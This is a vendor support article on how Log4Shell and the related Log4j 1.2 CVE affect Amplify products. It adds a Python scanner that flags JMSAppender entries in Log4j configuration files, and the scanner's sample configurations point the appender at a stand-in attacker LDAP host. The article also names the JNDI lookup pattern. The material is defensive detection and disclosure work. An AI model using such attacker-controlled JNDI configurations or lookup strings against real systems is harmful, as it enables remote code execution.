KB Article #181955

Impact and resolution of CVE-2021-44228 (Log4Shell) in Amplify

Axway Engineering has confirmed that Amplify SaaS services are NOT vulnerable


Context


A zero-day vulnerability in the popular Java logging library Log4j, CVE-2021-44228 (also known as Log4Shell), was published on GitHub together with a proof of concept showing that Remote Code Execution (RCE) is possible when a vulnerable Log4j 2.x version (2.0-beta9 through 2.14.1) logs an attacker-controlled string. A JNDI lookup embedded in the logged value (for example a string of the form ${jndi:ldap://...}) makes Log4j contact the attacker's server and load a remote class. Log4j 1.x does not implement the lookup feature and is not affected by CVE-2021-44228 (CVE-2021-4104, which concerns Log4j 1.2, is a separate issue).

Axway is aware of Log4j CVE-2021-44228 and is evaluating its impact on all Axway products. As conclusions and recommendations become available, they will be published in the dedicated alert on support.axway.com: https://support.axway.com/news/1331/lang/en

This article provides recommendations and technical clarifications regarding the impact of CVE-2021-44228 on the Amplify platform.


Details:


Amplify Central / Unified Catalog
Amplify Central and Unified Catalog do not use log4j and are not vulnerable.

Amplify repository

The Amplify repository is not vulnerable, based on feedback from JFrog: https://jfrog.com/knowledge-base/general-jfrog-ser...

Amplify Analytics

The fix is being deployed to production (Europe and US) on December 16th.

AxwayID

AxwayID runs on Red Hat Single Sign-On 7, which bundles Log4j 1.2 and is therefore affected by CVE-2021-4104 (a deserialization flaw in the Log4j 1.2 JMSAppender; see the Red Hat statement: https://access.redhat.com/security/cve/CVE-2021-4104). This is a different and lower-severity issue from CVE-2021-44228: Log4j 1.x has no lookup feature, and CVE-2021-4104 is only exploitable when the JMSAppender is configured and an attacker can control its JNDI provider, which in practice requires write access to the logging configuration. AxwayID is not affected because:

  1. The JMSAppender is not configured for use.
  2. Changing the logging configuration is restricted to AGO.
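The first condition is something any operator of a Log4j 1.2 application can verify directly. The following Python script is an added example (not part of this article and not AxwayID's own tooling) that inspects both configuration formats Log4j 1.2 accepts, log4j.properties and log4j.xml, and reports appenders whose class is org.apache.log4j.net.JMSAppender. The sample configurations are constructed for illustration; the provider URL in the properties sample is a placeholder showing what an attacker-controlled JMSAppender would look like.

```python
import re
import xml.etree.ElementTree as ET

# Appender classes whose presence makes a Log4j 1.2 deployment relevant to
# CVE-2021-4104 (JMSAppender deserializes objects from a JNDI-resolved provider).
RISKY_APPENDERS = {"org.apache.log4j.net.JMSAppender"}

# Constructed sample log4j.properties (not a real AxwayID configuration):
# a JMSAppender pointed at an attacker-controlled LDAP provider.
SAMPLE_PROPERTIES = """\
log4j.rootLogger=INFO, console, jms
log4j.appender.console=org.apache.log4j.ConsoleAppender
log4j.appender.console.layout=org.apache.log4j.PatternLayout
log4j.appender.jms=org.apache.log4j.net.JMSAppender
log4j.appender.jms.InitialContextFactoryName=com.sun.jndi.ldap.LdapCtxFactory
log4j.appender.jms.ProviderURL=ldap://attacker.example/o=JNDITest
"""

# Constructed sample log4j.xml with only a file appender (the safe case).
SAMPLE_XML_SAFE = """\
<log4j:configuration xmlns:log4j="http://jakarta.apache.org/log4j/">
  <appender name="FILE" class="org.apache.log4j.RollingFileAppender">
    <param name="File" value="server.log"/>
  </appender>
  <root><level value="INFO"/><appender-ref ref="FILE"/></root>
</log4j:configuration>
"""

# Constructed sample log4j.xml that does declare a JMSAppender.
SAMPLE_XML_JMS = """\
<log4j:configuration xmlns:log4j="http://jakarta.apache.org/log4j/">
  <appender name="JMS" class="org.apache.log4j.net.JMSAppender">
    <param name="InitialContextFactoryName" value="com.sun.jndi.ldap.LdapCtxFactory"/>
    <param name="ProviderURL" value="ldap://attacker.example/o=JNDITest"/>
  </appender>
  <root><level value="INFO"/><appender-ref ref="JMS"/></root>
</log4j:configuration>
"""

# "log4j.appender.<name>=<class>"; keys with further dots are appender
# options (layout, ProviderURL, ...) and deliberately do not match.
APPENDER_DEF = re.compile(r"^\s*log4j\.appender\.([^.=:\s]+)\s*[=:]\s*(\S+)")


def risky_appenders_in_properties(text):
    """Return (appender name, class) pairs for risky appenders in a properties file."""
    found = []
    for line in text.splitlines():
        match = APPENDER_DEF.match(line)
        if match and match.group(2) in RISKY_APPENDERS:
            found.append((match.group(1), match.group(2)))
    return found


def risky_appenders_in_xml(text):
    """Return (appender name, class) pairs for risky appenders in a log4j.xml file."""
    root = ET.fromstring(text)
    found = []
    for appender in root.iter("appender"):
        cls = appender.get("class", "")
        if cls in RISKY_APPENDERS:
            found.append((appender.get("name"), cls))
    return found


def jms_appender_configured(properties_text=None, xml_text=None):
    """True if either configuration declares a JMSAppender."""
    hits = []
    if properties_text is not None:
        hits += risky_appenders_in_properties(properties_text)
    if xml_text is not None:
        hits += risky_appenders_in_xml(xml_text)
    return bool(hits)


if __name__ == "__main__":
    print("properties:", risky_appenders_in_properties(SAMPLE_PROPERTIES))
    print("xml (safe):", risky_appenders_in_xml(SAMPLE_XML_SAFE))
    print("xml (jms):", risky_appenders_in_xml(SAMPLE_XML_JMS))
```

Point the functions at the deployed log4j.properties or log4j.xml (read from disk) to confirm the first condition; the second condition, restricting who can change that configuration, is an access-control matter that a file scan cannot verify and has to be checked against the platform's permissions.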

Application Integration

Application Integration is not vulnerable as documented separately at https://support.axway.com/kb/181965


Products deployed on customer environment


The products below contain no Java code, so they do not use Log4j and are not vulnerable:


Agents

The Agents are written in Go.

CLI

The CLI is written in Node.js.